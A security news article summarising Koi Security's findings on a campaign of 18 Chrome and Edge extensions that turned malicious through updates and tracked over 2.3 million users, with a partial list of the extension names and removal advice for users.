A recent investigation by the security team at Koi Security has brought to light a significant threat affecting millions of internet users. The team identified a coordinated campaign involving 18 malicious browser extensions that remain accessible on both the Google Chrome and Microsoft Edge web stores. These extensions have collectively impacted over 2.3 million users, making this one of the most extensive browser hijacking operations in recent years.
How the Malicious Extensions Operate
- Masquerading as Legitimate Tools: The extensions are disguised as productivity or entertainment add-ons, including emoji keyboards, weather apps, VPN proxies, and video speed controllers.
- Functional Yet Harmful: While providing the promised features, these extensions secretly monitor user activity and can redirect browsing sessions.
- Stealthy Updates: The malicious code was introduced through updates after the initial, benign versions were installed. These updates are delivered silently via the browsers’ auto-update systems, making them difficult to detect.
Technical Details
- Data Exfiltration: The extensions utilize browser APIs to monitor web navigation, capturing URLs and unique user IDs, which are then transmitted to remote servers.
- Potential for Hijacking: The infrastructure allows attackers to redirect users to potentially harmful destinations, although no such redirections were observed during the researchers’ analysis.
- Centralized Control: All 18 extensions are managed via a single command-and-control infrastructure, despite appearing to originate from different developers. Koi Security has dubbed this campaign “RedDirection”.
List of Malicious Extensions
Below is an HTML table summarizing some of the identified malicious extensions:
| Extension Name | Description |
|---|---|
| Color Picker, Eyedropper — Geco colorpick | Color selection and eyedropper tool |
| Emoji keyboard online — copy&paste your emoji | Emoji keyboard and copy-paste utility |
| Free Weather Forecast | Weather forecast application |
| Video Speed Controller — Video manager | Video playback speed adjustment |
| Unlock Discord — VPN Proxy to Unblock Discord Anywhere | VPN proxy for Discord access |
| Dark Theme — Dark Reader for Chrome | Dark mode for web pages |
| Volume Max — Ultimate Sound Booster | Volume boosting tool |
| Unblock TikTok — Seamless Access with One-Click Proxy | Proxy tool for TikTok access |
| Unlock YouTube VPN | VPN for unblocking YouTube |
Risks and Recommendations
- Trusted Appearance: Many of these extensions were verified by Google and Microsoft and had numerous positive reviews, misleading users into trusting them.
- Silent Infections: Users may have installed these extensions when they were harmless, only to have them turn malicious through subsequent updates.
- Difficult Removal: Simply uninstalling the extensions may not be sufficient. Users are advised to clear browsing data and scan for additional malware.
Recommended Actions
- Uninstall any of the listed extensions immediately.
- Clear browser data to remove tracking identifiers.
- Perform a thorough malware scan.
- Monitor online accounts for suspicious activity.
Researchers – see how to download a browser extension without installing it.
